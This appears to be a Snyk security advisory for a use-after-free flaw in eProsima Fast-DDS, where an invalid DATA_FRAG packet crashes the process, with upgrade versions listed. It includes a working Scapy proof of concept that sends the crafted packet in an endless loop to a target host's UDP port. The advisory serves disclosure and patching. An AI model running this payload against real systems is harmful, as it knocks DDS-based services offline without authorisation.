Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade eProsima/Fast-DDS
to version 2.6.7, 2.10.3, 2.11.3, 2.12.2 or higher.
Affected versions of this package are vulnerable to Use After Free due to an invalid DATA_FRAG
Submessage causing a bad-free error, allowing for the remote termination of the Fast-DDS
process. If an invalid Data_Frag
packet is sent, the Inline_qos, SerializedPayload
member of object ch
will attempt to release memory without initialization, leading to a 'bad-free' error.
from scapy.all import *
hex_value = "525450530201ca00efe7c4e7d5eed6d6b901000016130000d6100000000000000000000000000010ffff00e2f2f2f2520201ca00efe700000100dd02"
abc = bytes.fromhex(hex_value)
while(1):
packet = Ether(src="00:0c:29:2a:fd:e5" ,dst="00:0c:29:19:57:f6") / \
IP(src="192.168.114.131",dst="192.168.114.167") / \
UDP(sport=57854, dport=7413) / abc
sendp(packet, iface="ens33")